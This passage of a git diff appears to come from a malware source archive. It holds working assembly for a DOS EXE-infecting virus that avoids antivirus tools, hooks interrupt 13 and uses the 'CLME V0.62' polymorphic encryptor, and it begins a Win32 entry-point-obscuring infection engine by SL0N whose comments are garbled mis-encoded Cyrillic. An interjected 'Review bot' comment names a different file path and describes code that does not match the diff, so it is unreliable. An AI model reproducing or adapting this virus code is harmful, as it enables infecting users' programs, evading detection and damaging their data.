+ jnz next_char + cmp word ptr ds:[bx-2],'EX' ; EXE-file ? + jz is_exe +do_not: + popa + jmp go_old21 + +is_exe: + cmp word ptr ds:[bx-6],'NA' ; 'TBSCAN.EXE' ? + jz do_not + cmp word ptr ds:[bx-6],'TO' ; 'F-PROT.EXE' ? + jz do_not + cmp word ptr ds:[bx-6],'86' + jz do_not + cmp word ptr ds:[bx-6],'YP' + jz do_not + cmp word ptr ds:[bx-6],'GE' +;* jz do_not + + push ds + push es + call tunnel_int13 + + mov ax,3d02 + call call_int21 ; open file for read/write + xchg bx,ax + + mov ax,5700 + call call_int21 ; get files date & time + push dx ; and save them + push cx + + or cx,0FFF0 + cmp cx,0FFFF ; seconds = 30 or 62 ? + jnz do_infect + + pop cx + pop dx + jmp close_file + +do_infect: + push cs + pop ds + + mov ah,3f + mov cx,18 + mov dx,offset buffer + call call_int21 ; read 24 byte from file + + push cx + push dx + + les ax,dword ptr buffer[0E] + mov word ptr initial_regs[4],ax + mov word ptr initial_regs[6],es + les ax,dword ptr buffer[14] + mov word ptr initial_regs,ax + mov word ptr initial_regs[2],es + + mov ax,4202 + xor cx,cx + cwd + call call_int21 ; seek to end of file + + push dx ; filesize + push ax + push bx ; file handle + + mov bx,word ptr buffer[8] + shl bx,4 ; *16 + sub ax,bx + sbb dx,0 + mov bx,10 + div bx + mov word ptr buffer[16],ax + add ax,100 + mov word ptr buffer[0E],ax + mov word ptr buffer[14],dx + mov word ptr buffer[10],0 + + mov cs:int_ss,ss + mov cs:int_sp,sp + + mov ax,cs + cli + mov ss,ax + mov sp,offset own_stack + sti + + mov ax,cs + mov bx,offset virus_end + 50 + shr bx,4 + add ax,bx + mov es,ax + mov bp,dx + mov dx,0 + mov cx,offset virus_end + call mutate + + cli + mov sp,cs:int_sp + mov ss,cs:int_ss + sti + + pop bx ; file handle + mov ah,40 + cwd + call call_int21 ; append virus to file + + push cs + pop ds + pop ax ; filesize + pop dx + add ax,cx + adc dx,0 + push bx + mov bx,0200 + div bx ; => size in pages + mov word ptr buffer[2],dx + or dx,dx + jz last_page_full + inc ax +last_page_full: + mov word ptr buffer[4],ax + + mov 
ax,4200 + pop bx + xor cx,cx + cwd + call call_int21 ; seek to top of file + + mov ah,40 + pop dx + pop cx + call call_int21 ; write new header to file + + mov ax,5701 + pop cx + pop dx + or cx,0F + call call_int21 ; set modified time + +close_file: + mov ah,3e + call call_int21 ; close file + + mov ah,0dh + int 21 ; reset all drives + + xor ax,ax + mov ds,ax ; DS := 0 + mov ax,word ptr cs:oldint13 + mov word ptr ds:[4c],ax + mov ax,word ptr cs:oldint13+2 + mov word ptr ds:[4e],ax + + pop es + pop ds + popa + jmp go_old21 + + +call_int21: + pushf + + db 09A ; CALL FAR xxxx:xxxx +tunneled_int21 dd ? + + ret + +tunnel_int13: + pusha + push ds + push es + xor bx,bx + mov es,bx ; ES := 0 + mov ax,0F000 + mov ds,ax ; DS := 0F000 +search_loop: + inc bx + cmp dword ptr ds:[bx],0FB80FA80 + jnz search_loop + mov ax,ds + shl eax,10 + xchg bx,ax + xchg eax,dword ptr es:[004c] ; set new int 13 + mov dword ptr cs:oldint13,eax ; save old int 13 + pop es + pop ds + popa + ret + +start_host: + db 0EA ; JMP FAR +old_ip dw ? +old_cs dw ? +old_ss dw ? +old_sp dw ? + +oldint13 dd ? +oldint03 dd ? + +initial_regs dw ? + dw ? + dw ? + dw ? + + +checksum db 06F + +buffer db 18 dup (?) + + +int_sp dw ? +int_ss dw ? + + db 28 dup (?) + +own_stack: + db 9 dup (?) + + +; Input: +; CX - byte to crypt +; DS:DX - pointer to ccode to crypt (DS must be equal to CS!) +; ES - working segment +; BP - offset the deryptor should run on later +; Output: +; CX - byte in encrypted code and decryptor +; DS:DX - pointer to decryptor end encr. 
code +mutate: + jmp start2 + + db 'CLME V0.62' + +start2: + push ax + push bx + push si + push di + xchg bp,ax + ; get offset the engine runs on + call flex1 +flex1: + pop bp + sub bp,offset flex1 + ; save parameters + mov o_es[bp],es + mov o_ds[bp],ds + mov o_dx[bp],dx + mov o_cx[bp],cx + mov o_ax[bp],ax + ; init the engine + xor di,di ; it begins at ES:0 to create the decryptor + mov step_count[bp],0 ; begin with step 0 + mov int_allready[bp],0 ; no int 8/1c generated yet +next_round: + ; + call rnd_get + mov bl,12 ; random values 0..E + call rnd_limited + xor ah,ah + xchg cx,ax + jcxz next_round ; 0 not allowed + cmp step_count[bp],2 + ja after_step_2 + add cx,10 ; up to step 2 use more junk +after_step_2: + cmp step_count[bp],6 ; before last step ? + jz step_6 ; yes + call rnd_get + mov bl,33 ; random value from 0..5 + call rnd_limited + cmp al,5 + jz case_1 + cmp al,4 + jz case_2 + cmp al,3 + jz case_3 + cmp al,2 + jz case_4 + cmp al,1 + jz case_5 + ; generate a int 8/1c + cmp di,10 ; within the first 16 byte ? + jb do_not_gen_int ; yes then do not generate + cmp int_allready[bp],1 ; allready generated such a int ? 
+ jz do_not_gen_int ; yes then do not generate + mov int_allready[bp],1 ; set flag + mov al,0cdh ; INT + stosb + call rnd_get + and ax,1 + or al,al + jz int_1c ; take INT 1c + mov al,8 ; take int 8 + jmp int_both +int_1c: + mov al,1c +int_both: + stosb ; put the int number + ;org 98 +do_not_gen_int: + loop after_step_2 + jmp junk_done + ;org 9C +case_5: + call junk1 + jmp do_not_gen_int + ;org 0A1 +case_1: + call junk2 + jmp do_not_gen_int + ;org 0A6 +case_2: + call junk3 + jmp do_not_gen_int + ;org 0AB +case_3: + call junk4 + jmp do_not_gen_int + ;org 0B0 +case_4: + call junk5 + jmp do_not_gen_int + ;org 0B5 +step_6: + call junk6 + loop after_step_2 + jmp not_step_4 + ;org 0BC +junk_done: + cmp step_count[bp],0 + jnz not_step_0 + ; Init Address + mov pos_addrinit[bp],di ; save position + inc step_count[bp] + lea si,mov_ax[bp] ; MOV AX opcode + cld + movsb + movsw ; put it + jmp next_round +not_step_0: + cmp step_count[bp],1 + jnz not_step_1 + ; Init encryption value + mov pos_encrinit[bp],di ; save position + inc step_count[bp] + lea si,mov_al[bp] ; MOV AL opcode + cld + movsw ; put it + jmp next_round +not_step_1: + cmp step_count[bp],2 + jnz not_step_2 + ; make encryption + mov pos_encrypt[bp],di + inc step_count[bp] + lea si,xor_opcode[bp] + cld + movsb + movsw + jmp next_round +not_step_2: + cmp step_count[bp],3 + jnz not_step_3 + ; make encryption value modifier + mov pos_modif[bp],di ; save postion + inc step_count[bp] + lea si,add_al[bp] ; ADD AL opcode + cld + movsw + jmp next_round +not_step_3: + cmp step_count[bp],4 + jnz not_step_4 + ; make address increase + mov pos_increase[bp],di ; save position + inc step_count[bp] + lea si,inc_ax[bp] ; INC AX opcode + cld + movsb + jmp next_round + +not_step_4: + cmp step_count[bp],5 + jnz not_step_5 + ; make address compare + mov pos_addrcmp[bp],di ; save position + inc step_count[bp] + lea si,cmp_ax[bp] ; CMP AX,value opcode + cld + movsw + movsw + jmp next_round + +not_step_5: + ; end decryptor with JNZ + mov 
pos_loopjmp[bp],di + lea si,jnonz[bp] ; JNZ (backwards to begin of loop) + cld + movsw ; put it + ; choose encryption value + call rnd_get + mov encr_val[bp],al + ; and put it into the opcode with initializises it + mov di,pos_encrinit[bp] + inc di + cld + stosb + ; + call choose_addrreg + mov di,pos_addrinit[bp] + add byte ptr es:[di],al + mov di,pos_increase[bp] + add byte ptr es:[di],al + mov di,pos_addrcmp[bp] + inc di + add byte ptr es:[di],al + mov di,pos_encrypt[bp] + inc di + inc di + cmp al,3 + jnz is_not_bx + add byte ptr es:[di],9 + jmp zero_encryption_value +is_not_bx: + add byte ptr es:[di],al +zero_encryption_value: + ; choose the value for the encryption modifying + call rnd_get + or al,al + jz zero_encryption_value + mov modif_val[bp],al + ; insert it into the modifier opcode + mov di,pos_modif[bp] + inc di + mov byte ptr es:[di],al + ; fix the address in the address init + mov di,pos_addrinit[bp] + inc di + mov ax,pos_loopjmp[bp] + inc ax + inc ax + add ax,o_ax[bp] + stosw + ; fix the address in the address compare + mov di,pos_addrcmp[bp] + inc di + inc di + add ax,o_cx[bp] + inc ax + stosw + ; fix the jnz that makes the loop + mov di,pos_loopjmp[bp] + mov ax,pos_encrypt[bp] + sub ax,di + dec ax + dec ax + inc di + stosw ; stores as word but higher byte will be overwritten + ; copy the code to crypt after the decryptor + mov ds,o_ds[bp] + mov si,o_dx[bp] + mov di,pos_loopjmp[bp] + inc di + inc di + mov cx,o_cx[bp] + cld + rep movsb + ; encrypt the whole stuff + mov al,encr_val[bp] + mov di,pos_loopjmp[bp] + inc di + inc di + mov cx,o_cx[bp] + mov ah,modif_val[bp] +encryption_loop: + xor es:[di],al + inc di + add al,ah + loop encryption_loop + ; calculate result values + mov cx,pos_loopjmp[bp] + inc cx + inc cx + add cx,o_cx[bp] + push es + pop ds + xor dx,dx + ; leave the engine + pop di + pop si + pop bx + pop ax + ret + + ;org 212 +junk1: + push cx + call rnd_get + push bx + mov bl,1c ; random value 0..9 + call rnd_limited + pop bx + lea 
bx,junk_table[bp] + xor ah,ah + add bx,ax ; index in thhe table + mov al,byte ptr ds:[bx] ; get opcode + cld + stosb ; put it + ; add second byte + call choose_reg8 + xchg al,bl + mov cl,3 + shl bl,cl + call choose_reg8 + add al,bl + add al,0C0 + cld + stosb + pop cx + ret + + ;org 23Dh +junk2: + push cx + call rnd_get + push bx + mov bl,1c ; random value 0..9 + call rnd_limited + pop bx + lea bx,junk_table[bp] + xor ah,ah + add bx,ax + mov al,byte ptr ds:[bx] ; get opcode + inc al ; make it a word operation + cld + stosb ; put it + call choose_reg16 + xchg al,bl + mov cl,3 + shl bl,cl + call choose_reg16 + add al,bl + add al,0C0 + cld + stosb ; put second byte + pop cx + ret + + ;org 26A +junk3: + mov al,80 ; prefix 80 + jmp prefix_junk + ;org 26E +junk4: + mov al,81 ; prefix 81 + jmp prefix_junk + ;org 272 +junk5: + mov al,83 ; prefix 83 + jmp prefix_junk + ;org 276 +prefix_junk: + push cx + cld + stosb ; put the prefix + xor ah,ah + xchg al,dl ; save prefix to DL + call rnd_get + mov bl,24 + call rnd_limited ; random value 0..7 + mov cl,3 + shl al,cl + add al,0c0 + xchg al,bl ; save to bl + cmp dl,80 ; prefix was 80 ? + jnz its_word_register ; no then word reg + call choose_reg8 + jmp reg_choosen +its_word_register: + call choose_reg16 +reg_choosen: + add al,bl ; add to previous calculated + cld + stosb ; put it + call rnd_get + cmp dl,81 ; was prefix 81 ? 
+ jz put_word_data ; then put word data + cld + stosb ; put data + jmp putted_data +put_word_data: + cld + stosw ; put data +putted_data: + pop cx + ret + ;org 2AE +junk6: + push cx + call rnd_get + and al,1 + lea bx,junk_part[bp] + xor ah,ah + add bx,ax + mov al,byte ptr ds:[bx] ; get opcode + cld + stosb ; put it + call choose_reg16 ; insert regs into second byte + xchg al,bl + mov cl,3 + shl bl,cl + call choose_reg16 + add al,bl + add al,0c0 + cld + stosb ; put it + pop cx + ret + + ;org 2D4 + ; Get a random value in AX +rnd_get: + push bx + push cx + lea bx,last_rnd[bp] + in al,40 + xchg al,cl + in al,40 + xchg al,ah + in al,40 +assume ds:nothing + add ax,word ptr cs:[bx] + rol ax,cl + mov word ptr cs:[bx],ax +assume ds:_TEXT + pop cx + pop bx + ret + + ; 2ef +rnd_limited: + ; limited random number + ; 0...FFh/BL + push dx + xor dx,dx + call rnd_get + mov ah,0 + div bl + pop dx + ret + ; 2fb + +choose_addrreg: + call rnd_get + push bx + mov bl,24 + call rnd_limited + pop bx + cmp al,3 + jz adress_reg_choosen ; BX is ok + cmp al,6 + jb choose_addrreg ; only ok for SI,DI +adress_reg_choosen: + ret + +; org 30e +choose_reg8: + call rnd_get + push bx + mov bl,24 ; random value 0..7 + call rnd_limited + pop bx + or al,al + jz choose_reg8 ; 0 not allowed (AL) + cmp al,3 + jz choose_reg8 ; 3 not ok (BL) + cmp al,7 + jz choose_reg8 ; 7 not ok (BH) + ret + + ;org 325 +choose_reg16: + call rnd_get + push bx + mov bl,24 ; random value 0..7 + call rnd_limited + pop bx + or al,al ; 0 not ok (AX) + jz choose_reg16 + cmp al,3 ; 3 not ok (BX) + jz choose_reg16 + cmp al,4 ; 4 not ok (SP) + jz choose_reg16 + cmp al,6 ; 6,7 not ok (SI,DI) + jnb choose_reg16 + ret + + +modif_val db ? +encr_val db ? +last_rnd dw ? +step_count db ? +int_allready db ? +o_es dw ? +o_ds dw ? +o_dx dw ? +o_cx dw ? +o_ax dw ? +pos_addrinit dw ? +pos_encrinit dw ? +pos_encrypt dw ? +pos_modif dw ? +pos_increase dw ? +pos_addrcmp dw ? +pos_loopjmp dw ? 
+
+ db 0C0 ;*
+junk_table db 0,8,10,18,20,28,30,84
+junk_part db 86,88 ; XCHG, MOV
+mov_ax db 0B8,0,0 ; MOV AX,0
+mov_al db 0B0,0 ; MOV AL,0
+xor_opcode db 2E,30,0FE ; XOR BYTE PTR CS:[reg16],reg8
+add_al db 4,0 ; ADD AL,0
+inc_ax db 40 ; INC AX
+cmp_ax db 81,0F8,0,0 ; CMP AX,0
+jnonz db 75,1E ; JNZ
+
+virus_end equ $
+
+end start
diff --git a/Win32/Virus.Win32.Spot.asm b/Win32/Virus.Win32.Spot.asm
new file mode 100644
index 00000000..09e37f99
--- /dev/null
+++ b/Win32/Virus.Win32.Spot.asm
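Review bot: The file added here is 16-bit real-mode DOS code, not Win32: `.model small`, `assume cs:_TEXT,ds:_TEXT,ss:_TEXT`, DOS services via `int 21` (`mov ax,4b00`, `mov ah,3dh`, `mov ah,31`) and BIOS disk access through the `ds:[004ch]` vector, so the `Win32/Virus.Win32.Ming.asm` path misclassifies it and will mislead anyone deriving triage notes or signatures from the directory layout; a one-line header such as `; NOTE: 16-bit DOS EXE infector (MASM); filed under Win32/ for archival reasons only` would prevent readers from assuming PE semantics. The `.radix 10h` directive near the top makes every unsuffixed literal hexadecimal (`mov cx,19bh`, `mov ax,1301`, `cmp ax,4b00`), which is easy to overlook in a 1000-line listing; annotating that line with `; .radix 10h: all bare numerals in this file are hex` would make the constants readable at a glance. For defenders, the stable artifacts recorded in this hunk are the in-memory self-check (`int 21` with `ah=0f2` answered by `ah=2`), the `'CLME V0.62'` engine marker and the `copyright` text, and the `newint01` path issues unconditional BIOS sector writes across tracks and drives, which is the destructive payload; both facts belong in a short descriptive comment at the file head rather than only in the code.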
@@ -0,0 +1,534 @@ +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; [SIMPLE EPO TECHNIQUE ENGINE V. 0.1] ; +; ; +; ########### ########### ############ ############## ; +; ############# ############# ############## ############## ; +; ## ### ## ### ### ### ; +; ############ ############# ### ### ### ; +; ############ ############ ### ### ### ; +; ### ### ### ### ### ; +; ############# ### ############## ### ; +; ########### ### ############ ### ; +; ; +; FOR MS WINDOWS ; +; ; +; BY SL0N ; +;------------------------------------------------------------------------------; +; MANUAL: ; +; ADDRESS OF MAPPED FILE -> EDX ; +; ; +; CALL EPO ; +;------------------------------------------------------------------------------; +; MANUAL FOR RESTORE: ; +; CALL RESTORE ; +; ; +; ENTRY POINT -> EBX ; +;------------------------------------------------------------------------------; +; (+) DO NOT USE WIN API ; +; (+) EASY TO USE ; +; (+) GENERATE GARBAGE INSTRUCTIONS (1,2,3,4,5,6 BYTES) ; +; (+) USE X87 INSTRUCTIONS ; +; (+) RANDOM NUMBER OF SPOTS ; +; (+) MUTABLE SPOTS ; +; (+) RANDOM LENGTH OF JUMP ; +;------------------------------------------------------------------------------; +epo: + push esi edi ; Ñîõðàíÿåì â ñòýêå esi + ; è edi + mov [ebp+map_address],edx ; Ñîõðàíÿåì àäðåñ ôàéëà â + ; ïàìÿòè + call get_head ; Ïîëó÷àåì PE çàãîëîâîê + ; + call search_eip ; Âû÷èñëÿåì íîâóþ òî÷êó + ; âõîäà + call find_code ; Èùåì íà÷àëî êîäà â ýòîì + ; ôàéëå + call spots ; Ïîìåùàåì òóäà ïåðåõîä + ; íà âèðóñ + pop edi esi ; Âîññòàíàâëèâàåì èç ñòýêà + ; edi è esi + ret ; Âûõîäèì èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; PE HEADER SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; FILE IN MEMORY -> EDX ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; + +get_head: + ; Ïîäïðîãðàììà ïîëó÷åíèÿ + ; PE çàãîëîâêà + + pusha ; Ñîõðàíÿåì âñ¸ â ñòýêå + + mov ebx,[edx + 3ch] ; + add ebx,edx ; + ; + mov [ebp + PE_header],ebx ; ñîõðàíÿåì PE çàãîëîâîê + mov esi,ebx ; + mov edi,esi ; + mov ebx,[esi + 28h] ; + mov [ebp + old_eip],ebx ; Ñîõðàíÿåì ñòàðóþ òî÷êó + ; âõîäà (eip) + mov ebx,[esi + 34h] ; + mov [ebp + image_base],ebx ; Ñîõðàíÿåì + ; âèðòóàëüíûé àäðåñ + ; íà÷àëà ïðîãðàììû + popa ; Âûíèìàåì âñ¸ èç ñòýêà + ret ; Âûõîäèì èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; NEW ENTRY POINT SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +search_eip: + ; Ïîäïðîãðàììà âû÷èñëåíèÿ + ; íîâîé òî÷êè âõîäà + + pusha ; Ñîõðàíÿåì âñ¸ â ñòýêå + + mov esi,[ebp+PE_header] ; Êëàä¸ì â esi óêàçàòåëü + ; Íà PE çàãîëîâîê + mov ebx,[esi + 74h] ; + shl ebx,3 ; + xor eax,eax ; + mov ax,word ptr [esi + 6h] ; Êîëè÷åñòâî îáúåêòîâ + dec eax ; (íàì íóæåí ïîñëåäíèé-1 + mov ecx,28h ; çàãîëîâîê ñåêöèè) + mul ecx ; * ðàçìåð çàãîëîâêà + add esi,78h ; òåïåðü esi óêàçûâàåò + add esi,ebx ; íà íà÷àëî ïîñëåäíåãî + add esi,eax ; çàãîëîâêà ñåêöèè + + mov eax,[esi+0ch] ; + add eax,[esi+10h] ; Ñîõðàíÿåì íîâóþ òî÷êó + mov [ebp+new_eip],eax ; âõîäà + + popa ; Âûíèìàåì âñ¸ èç ñòýêà + + ret ; Âûõîäèì èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; FIND START OF CODE SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ 
OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +find_code: + ; Ïîäïðîãðàììà ïîèñêà íà÷àëà + ; êîäà + + mov esi,[ebp+PE_header] ; Êëàä¸ì â esi óêàçàòåëü + ; Íà PE çàãîëîâîê + + mov ebx,[esi + 74h] ; + shl ebx,3 ; Ïîëó÷àåì + xor eax,eax ; + mov ax,word ptr [esi + 6h] ; Êîëè÷åñòâî îáúåêòîâ +find2: + mov esi,edi ; + dec eax ; + push eax ; (íàì íóæåí ïîñëåäíèé-1 + mov ecx,28h ; çàãîëîâîê ñåêöèè) + mul ecx ; * ðàçìåð çàãîëîâêà + add esi,78h ; òåïåðü esi óêàçûâàåò íà + add esi,ebx ; íà÷àëî ïîñëåäíåãî + ; çàãîëîâêà + add esi,eax ; ñåêöèè + mov eax,[ebp+old_eip] ;  eax ëîæèì òî÷êó âõîäà + mov edx,[esi+0ch] ;  edx àäðåñ êóäà áóäåò + ; ìàïèòüñÿ + ; òåêóùàÿ ñåêöèÿ + cmp edx,eax ; Ïðîâåðÿåì + pop eax ; Âûíèìàåì èç ñòýêà eax + jg find2 ; Åñëè áîëüøå èùåì äàëüøå + add edx,[esi+08h] ; Äîáàâëÿåì âèðòóàëüíûé + ; ðàçìåð ñåêöè + cmp edx,[ebp+old_eip] ; Ïðîâåðÿåì + jl find2 ; Åñëè ìåíüøå èùåì äàëüøå + + mov edx,[esi+0ch] ; Äàëåå âû÷èñëÿåì + ; ôèçè÷åñêîå + mov eax,[ebp+old_eip] ; ñìåùåíèå êîäà â ôàéëå + sub eax,edx ; + add eax,[esi+14h] ; + add eax,[ebp+map_address] ; È ïîòîì äîáàâëÿåì áàçó + ; ïàìÿòè + + mov [ebp+start_code],eax ; Ñîõðàíÿåì íà÷àëî êîäà + + or [esi + 24h],00000020h or 20000000h or 80000000h + ; Ìåíÿåì àòòðèáóòû + ; êîäîâîé ñåêöèè + + mov eax,[esi+08] ; Âû÷èñëÿåì ðàçìåð + sub eax,[ebp+old_eip] ; òîé ÷àñòè êîäîâîé ñåêöèè, + mov edx,[esi+10h] ; ãäå ìîæíî ðàçìåùàòü + sub edx,eax ; ïÿòíà + mov [ebp+size_for_spot],edx ; + + ret ; Âîçâðàò èç ïðîöåäóðû + +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOTS GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; 
+spots: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; ïÿòåí + + mov ecx,1 ; Êëàä¸ì â ecx åäèíèöó + ; + call reset ; Ïîäãîòàâëèâàåì äàííûå + call num_spots ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + ; ýòî áóäåò êîë-âî ïÿòåí +tred: + call save_bytes ; Ñîõðàíÿåì çàòèðàåìû áàéòû + call gen_spot ; Ãåíåðèðóåì ïÿòíî + + inc ecx ; Óâåëè÷èâàåì ecx íà åäèíèöó + cmp ecx,[ebp+n_spots] ; Âñå ïÿòíà ñãåíåðèðîâàíû + jne tred ; Åñëè íåò, òî ãåíåðèðóåì + + call save_bytes ; Ñîõðàíÿåì ïîñëåäíèå áàéòû + call gen_final_spot ; È ãåíåðèðóåì ïîñëåäíåå + ; ïÿòíî + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOT GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +gen_spot: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; îäíîãî ïÿòíà + + push eax ecx ; Ñîõðàíÿåì eax è ecx + + call len_sp_jmp ; Ïîëó÷àåì ñëó÷àéíóþ äëèíó + xchg eax,ebx ; ïðûæêà ïÿòíà + + call testing ; Ïðîâåðÿåì, ÷òîáû ïÿòíî + jc quit2 ; íå âûõîäèëî çà êîäîâóþ + ; ñåêöèþ + push ebx + xor bx,bx + dec bx + mov ecx,[ebp+num1] ; Ãåíåðèðóåì ïåðâóþ ïàðòèþ + call garbage ; ìóñîðà + pop ebx + + mov al,0e9h ; + stosb ; + mov eax,0 ; Ãåíåðèðóåì jmp + add eax,ebx ; + add eax,ecx ; + stosd ; + + push ebx + xor bx,bx + dec bx + mov ecx,[ebp+num2] ; Ãåíåðèðóåì âòîðóþ ïàðòèþ + call garbage ; ìóñîðà + pop ebx + + sub edi,[ebp+num2] ; + add edi,[ebp+num1] ; Êîððåêòèðóåì edi + add edi,ebx ; +quit2: + pop ecx eax ; Âîññòàíàâëèâàåì ecx è eax + + ret ; Âîçâðàò èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; LAST SPOT GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; 
+;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +gen_final_spot: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; ôèíàëüíîãî ïÿòíà + + push eax ecx ; Ñîõðàíÿåì eax è ecx + + jc not_big ; Åñëè äëèíà íå ïðåâûøàåò + inc [ebp+n_spots] ; ðàçìåðà êîäîâîé ñåêöèè, òî +not_big: ; Óâåëè÷èì êîë-âî ïÿòåí + mov ecx,[ebp+num1] ; Ãåíåðèðóåì ìóñîðíûå + call garbage ; èíñòðóêöèè + + push edi ; Ñîõðàíÿåì edi + sub edi,[ebp+start_code] ; Ïîäãîòàâëèâàåì äëèíó jmp'a + mov ebx,edi ; äëÿ ïîñëåäíåãî ïÿòíà + pop edi ; Âîññòàíàâëèâàåì edi + + mov al,0e9h ; + stosb ; + mov eax,0 ; + sub eax,5 ; Ãåíåðèðóåì ôèíàëüíîå + sub eax,ebx ; ïÿòíî + add eax,[ebp+new_eip] ; + sub eax,[ebp+old_eip] ; + stosd ; + + mov ecx,[ebp+num2] ; Ãåíåðèðóåì âòîðóþ ïàðòèþ + call garbage ; ìóñîðíûõ èíñòðóêöèé + + pop ecx eax ; Âîññòàíàâëèâàåì ecx è eax + ret ; Âîçâðàò èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOTS GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; ADDRESS OF SAVING BYTES -> EDI ; +; QUANTITY OF BYTES -> EBX ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +save_bytes: + ; Ïîäïðîãðàììà ñîõðàíåíèÿ + ; çàìåíÿåìûõ áàéò + + pusha ; Ñîõðàíÿåì âñ¸ â ñòýêå + call length1 ; Ãåíåðèðóåì äëèíû ìóñîðíûõ + ; èíñòðóêöèé + mov ebx,[ebp+num1] ; Ïîìåùàåì â ebx ïåðâóþ + add ebx,[ebp+num2] ; è âòîðóþ äëèíû + add ebx,5 ; Äîáàâëÿåì ê ebx - 5 + + mov esi,edi ; Ñîõðàíÿåì â áóôåðå ñ + mov edi,[ebp+pointer] ; íà÷àëà ñìåùåíèå â ïàìÿòè + mov eax,esi ; íà ñîõðàíÿåìûå áàéòû + stosd ; + mov ecx,ebx ; Ïîñëå ýòîãî ñîõðàíÿåì â + mov eax,ecx ; áóôåðå êîë-âî ñîõðàíÿåìûõ + stosd ; áàéò + + rep movsb ; 
È â ñàìîì êîíöå ñîõðàíÿåì + mov [ebp+pointer],edi ; â áóôåðå ñàìè áàéòû + ; + popa ; Âûíèìàåì âñ¸ èç ñòýêà + ret ; Âîçâðàò èç ïîäïðîãðàììû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; RESTORE SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; OLD ENTRY POINT -> EBX ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +restore: + ; Ïîäïðîãðàììà + ; âîññòàíîâëåíèÿ ñîõðàí¸ííûõ + ; áàéò + + cld ; Ïîèñê âïåð¸ä + lea esi,[ebp+rest_bytes] ;  esi óêàçàçàòåëü íà áóôåð + mov edx,1 ;  edx êëàä¸ì - 1 +not_enough: + mov edi,[ebp+old_eip] ;  edi çàãðóæàåì òî÷êó + add edi,[ebp+image_base] ; âõîäà + mov ebx,edi ; Ñîõðàíÿåì edi â ebx + lodsd ;  eax ñòàðîå ñìåùåíèå + ; áàéò â ïàìÿòè + sub eax,[ebp+start_code] ; Îòíèìàåì ñìåùåíèå 